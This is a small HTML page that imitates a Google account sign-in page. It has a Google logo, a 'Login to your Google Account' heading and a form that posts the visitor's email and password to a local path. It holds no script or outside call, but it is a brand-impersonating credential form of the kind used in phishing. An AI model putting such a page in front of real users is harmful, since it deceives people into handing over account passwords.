<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Google Login Page</title>
    <style>
        body { background-color: #ffffff; }  
        body.dark { background-color: #212121; color: white; }  
        h1 { font-size: 36px; margin-bottom: 0px; text-align: center; }  
        input[type=text], input[type=password] { width: 450px; padding: 12px; margin: auto; border-radius: 40px; }  
        label { font-size: 36pt; }  
        .container { max-width: 850px; margin: auto; }  
        .login_box { width: 75%; max-width: 75%; margin-left: auto; margin-right: auto; padding-top: 30px; }  
        a.logo img { display: block; margin: -8px auto; }  
        div#errorMessage { color: #f44336; font-weight: bold; }  
    </style>
</head>
<body class="dark">
    <div class="container">
        <div id="errorMessage"></div>
        <a href="#" class="logo"><img src="google_small.png" alt="Google Logo"></a>
        <h1>Login to your Google Account</h1>
        <form action="/accounts/Login" method="post" target="_top">
            <label for="Email"></label>
            <input type="email" id="Email" name="Email"><br/>
            <label for="Password"></label>
            <input type="password" id="Password" name="Password"><br/>
            <input type="submit" value="Log In">&nbsp;&nbsp;&nbsp;&nbsp;
        </form>
    </div>
</body>
</html>
